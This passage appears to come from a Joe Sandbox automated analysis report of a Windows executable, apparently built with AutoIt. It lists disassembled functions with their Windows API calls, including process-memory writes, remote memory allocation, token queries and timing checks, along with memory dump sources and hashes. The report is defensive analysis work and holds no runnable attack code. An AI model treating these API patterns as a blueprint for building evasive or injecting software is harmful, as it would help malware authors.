                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3897988419-0
                                                                                                                      • Opcode ID: 34fea9737a79ca0d85867a387ead39e6eb71faf21768c883091f9fc45b2deb48
                                                                                                                      • Instruction ID: b765ceffb141c96dc14bc21b32c98ffc3d99b3494fb90373f18817a500040f86
                                                                                                                      • Opcode Fuzzy Hash: 34fea9737a79ca0d85867a387ead39e6eb71faf21768c883091f9fc45b2deb48
                                                                                                                      • Instruction Fuzzy Hash: 42019ABA640208BBEB105F68DC44AEA7FBCEB49795F1000A4FD04D6220D732DD80EBA0
                                                                                                                      Function 00525244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00525260
                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0052526E
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00525276
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00525280
                                                                                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005252BC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2833360925-0
                                                                                                                      • Opcode ID: 8c302f365c8b1151013d3427670f78a3a571ce6a07c6506e8ab8ae4ac4d6b20d
                                                                                                                      • Instruction ID: aee07902dbd848859c5330bbb96ddff1cb5edd63203addbb42db91478f501f86
                                                                                                                      • Opcode Fuzzy Hash: 8c302f365c8b1151013d3427670f78a3a571ce6a07c6506e8ab8ae4ac4d6b20d
                                                                                                                      • Instruction Fuzzy Hash: AE013539D01A29DBCF00AFA8E848AEDBB78BF1A711F41045AE941B2180DB3095549BA1
                                                                                                                      Function 0051810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00518121
                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0051812B
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0051813A
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00518141
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00518157
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 44706859-0
                                                                                                                      • Opcode ID: faf5c1b4895fb5bf9bed1d81074a16882b84deb915170c03ff4dc48c946a6c1c
                                                                                                                      • Instruction ID: b7a96abd378604051a0f7c2c0fb48dd9de6f42d065ae75504fba278548878aba
                                                                                                                      • Opcode Fuzzy Hash: faf5c1b4895fb5bf9bed1d81074a16882b84deb915170c03ff4dc48c946a6c1c
                                                                                                                      • Instruction Fuzzy Hash: 7BF04475280304BFE7210FA9DC88FF73FADFF86758B100025F549C6150CAA19945EB60
                                                                                                                      Function 0051C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0051C1F7
                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0051C20E
                                                                                                                      • MessageBeep.USER32(00000000), ref: 0051C226
                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 0051C242
                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0051C25C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3741023627-0
                                                                                                                      • Opcode ID: 09df1ffe3f24bbfda9604f7fcc09a99095945fc19621888dc24cef1a35aef6b8
                                                                                                                      • Instruction ID: ed9aff07b9c00cae9867337e88570b97ec8a52050426de8efb5a605f1c83fb3f
                                                                                                                      • Opcode Fuzzy Hash: 09df1ffe3f24bbfda9604f7fcc09a99095945fc19621888dc24cef1a35aef6b8
                                                                                                                      • Instruction Fuzzy Hash: 0501A7384443049BFB205B54DD4EFD67F78FB11709F000669A592914E0D7F56988DB50
                                                                                                                      Function 004C13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EndPath.GDI32(?), ref: 004C13BF
                                                                                                                      • StrokeAndFillPath.GDI32(?,?,004FB888,00000000,?), ref: 004C13DB
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 004C13EE
                                                                                                                      • DeleteObject.GDI32 ref: 004C1401
                                                                                                                      • StrokePath.GDI32(?), ref: 004C141C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2625713937-0
                                                                                                                      • Opcode ID: b0797c3dae6ed9a257c6041d04f870cf900a880e39a11984f5cefbae2209a232
                                                                                                                      • Instruction ID: 318dfd91b7bee5b0966625f7a40afbfac6c01b6f0bb0d2fc8d3ee9b0058dd3f2
                                                                                                                      • Opcode Fuzzy Hash: b0797c3dae6ed9a257c6041d04f870cf900a880e39a11984f5cefbae2209a232
                                                                                                                      • Instruction Fuzzy Hash: 34F03638000748DBD7155F19DC4CB593FE4A76232AF289226E819541F1D734455DFF14
                                                                                                                      Function 004D2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004E0DB6: std::exception::exception.LIBCMT ref: 004E0DEC
                                                                                                                        • Part of subcall function 004E0DB6: __CxxThrowException@8.LIBCMT ref: 004E0E01
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                        • Part of subcall function 004C7A51: _memmove.LIBCMT ref: 004C7AAB
                                                                                                                      • __swprintf.LIBCMT ref: 004D2ECD
                                                                                                                      Strings
                                                                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 004D2D66
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                      • API String ID: 1943609520-557222456
                                                                                                                      • Opcode ID: 313ef11cc64aabb391975d1aae461375acaab5f899d0ef86e64de6aae3159fd8
                                                                                                                      • Instruction ID: 3f1e1655d7394643d15860b4464b30152d8c0a2208147b1cc967dcc1a2f45fd5
                                                                                                                      • Opcode Fuzzy Hash: 313ef11cc64aabb391975d1aae461375acaab5f899d0ef86e64de6aae3159fd8
                                                                                                                      • Instruction Fuzzy Hash: DB91ABB5108201AFC714EF25C895D6FBBA4FF95314F00481FF4919B2A1EA78ED44CB5A
                                                                                                                      Function 0052B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004C4743,?,?,004C37AE,?), ref: 004C4770
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0052B9BB
                                                                                                                      • CoCreateInstance.OLE32(00552D6C,00000000,00000001,00552BDC,?), ref: 0052B9D4
                                                                                                                      • CoUninitialize.OLE32 ref: 0052B9F1
                                                                                                                        • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
                                                                                                                        • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 2126378814-24824748
                                                                                                                      • Opcode ID: ac055c4a8b2360782d09bd6ff54cf6961238c6e0f94371808505593f3d978a1e
                                                                                                                      • Instruction ID: 01311dc6ddc23876db00200adca4640bcb47e9f733a126cbe578ac7c06a26bf6
                                                                                                                      • Opcode Fuzzy Hash: ac055c4a8b2360782d09bd6ff54cf6961238c6e0f94371808505593f3d978a1e
                                                                                                                      • Instruction Fuzzy Hash: D7A14675604211AFDB00EF15C484E5ABBE5FF8A318F04899DF8999B3A1CB31ED45CB91
                                                                                                                      Function 0051B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 0051B4BE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ContainedObject
                                                                                                                      • String ID: AutoIt3GUI$Container$%U
                                                                                                                      • API String ID: 3565006973-3915410733
                                                                                                                      • Opcode ID: b713ad8a85caaf45318a28c33ba0430d761283736dff05d993e1ef5863bb8884
                                                                                                                      • Instruction ID: 3f7844a3396ac4c55213146c4c54d5caf759d002dee54308da2bf10a96467331
                                                                                                                      • Opcode Fuzzy Hash: b713ad8a85caaf45318a28c33ba0430d761283736dff05d993e1ef5863bb8884
                                                                                                                      • Instruction Fuzzy Hash: D8914D70600601AFEB54DF65C884BAABBF5FF49711F10856DF94ACB291EBB1E881CB50
                                                                                                                      Function 004E501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 004E50AD
                                                                                                                        • Part of subcall function 004F00F0: __87except.LIBCMT ref: 004F012B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorHandling__87except__start
                                                                                                                      • String ID: pow
                                                                                                                      • API String ID: 2905807303-2276729525
                                                                                                                      • Opcode ID: 1f1bddbb157e9e011c6f834621ab4f831f65bb337208b57ca562c02083c35717
                                                                                                                      • Instruction ID: 7ca225c311b29d84cbae2fb5e59b3f5a6587e63cb094b574fa6c566a3d9380b0
                                                                                                                      • Opcode Fuzzy Hash: 1f1bddbb157e9e011c6f834621ab4f831f65bb337208b57ca562c02083c35717
                                                                                                                      • Instruction Fuzzy Hash: 04518C20D0864986DB117716CD1137F2B909B8070AF208D9BF5D5863ABDF3D8DC8A68F
                                                                                                                      Function 00508584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: 3cM$_M
                                                                                                                      • API String ID: 4104443479-23921487
                                                                                                                      • Opcode ID: 9934898ff32755472e6ac2071c50b970f76ec7e7c2a2e4b6caecfb8c0fcfd26b
                                                                                                                      • Instruction ID: 7a538ec7b6742ecd807099caa527c2adabd60aaeb4b4c48459719a05a97f7d04
                                                                                                                      • Opcode Fuzzy Hash: 9934898ff32755472e6ac2071c50b970f76ec7e7c2a2e4b6caecfb8c0fcfd26b
                                                                                                                      • Instruction Fuzzy Hash: CE516070900609DFCF24CF68C894ABEBBB1FF45304F24856AE89AD7390EB35A955CB51
                                                                                                                      Function 005197F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 005214BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00519296,?,?,00000034,00000800,?,00000034), ref: 005214E6
                                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0051983F
                                                                                                                        • Part of subcall function 00521487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005192C5,?,?,00000800,?,00001073,00000000,?,?), ref: 005214B1
                                                                                                                        • Part of subcall function 005213DE: GetWindowThreadProcessId.USER32(?,?), ref: 00521409
                                                                                                                        • Part of subcall function 005213DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0051925A,00000034,?,?,00001004,00000000,00000000), ref: 00521419
                                                                                                                        • Part of subcall function 005213DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0051925A,00000034,?,?,00001004,00000000,00000000), ref: 0052142F
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005198AC
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005198F9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 4150878124-2766056989
                                                                                                                      • Opcode ID: 25718447d26778c2d568d312e87ba583941e9e91b46be5454710228ae8d547db
                                                                                                                      • Instruction ID: 1a33140ef61cc903d7c542f7a88204088007cf570334732ecf5c1469d73c4914
                                                                                                                      • Opcode Fuzzy Hash: 25718447d26778c2d568d312e87ba583941e9e91b46be5454710228ae8d547db
                                                                                                                      • Instruction Fuzzy Hash: DB415E76901119BEDB10DFA4CC55EDEBBB8FF56300F004099F949B7181DA716E85CBA0
                                                                                                                      Function 00547946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0054F910,00000000,?,?,?,?), ref: 005479DF
                                                                                                                      • GetWindowLongW.USER32 ref: 005479FC
                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00547A0C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long
                                                                                                                      • String ID: SysTreeView32
                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                      • Opcode ID: c6dac75b32d0d8a1a34c91befd4ab0a43ea160b4503370fee84339a95753ea69
                                                                                                                      • Instruction ID: dcaec98af88d8ef538ffee7ef61e9652d629dee5db02fcd3aac495fadb96db06
                                                                                                                      • Opcode Fuzzy Hash: c6dac75b32d0d8a1a34c91befd4ab0a43ea160b4503370fee84339a95753ea69
                                                                                                                      • Instruction Fuzzy Hash: 2431C13520420AAFDB118E38DC45BEA7BA9FB09328F244729F875E32E1D731ED519B50
                                                                                                                      Function 005473D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00547461
                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00547475
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00547499
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window
                                                                                                                      • String ID: SysMonthCal32
                                                                                                                      • API String ID: 2326795674-1439706946
                                                                                                                      • Opcode ID: 9021685c172c11d88bbc95f94b3d6af300f047d38f10eb9bee40f3e9cc6578a1
                                                                                                                      • Instruction ID: 9bf0489afa010522a0d5383494910a69fd96dc897659e00d6d3e6531f56eb433
                                                                                                                      • Opcode Fuzzy Hash: 9021685c172c11d88bbc95f94b3d6af300f047d38f10eb9bee40f3e9cc6578a1
                                                                                                                      • Instruction Fuzzy Hash: E8218D32600219ABDF118E64DC46FEA3F69FB4D728F110214FE156B190DBB5A8559BA0
                                                                                                                      Function 00547B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00547C4A
                                                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00547C58
                                                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00547C5F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                                                      • String ID: msctls_updown32
                                                                                                                      • API String ID: 4014797782-2298589950
                                                                                                                      • Opcode ID: 86dfdb4bd724288ca8243410b8aeab0732cd5df315e8ed0a6f7b42395cdc35a6
                                                                                                                      • Instruction ID: 6d593894c72bb764de8c6655a06cd48d180cd3f2f9fe2e8ea8ab88db0cde2111
                                                                                                                      • Opcode Fuzzy Hash: 86dfdb4bd724288ca8243410b8aeab0732cd5df315e8ed0a6f7b42395cdc35a6
                                                                                                                      • Instruction Fuzzy Hash: 4B2181B5204108AFDB10DF28DCC5DA63BECFF5A358B140059F9059B3A1DB31EC119B60
                                                                                                                      Function 00546CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00546D3B
                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00546D4B
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00546D70
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
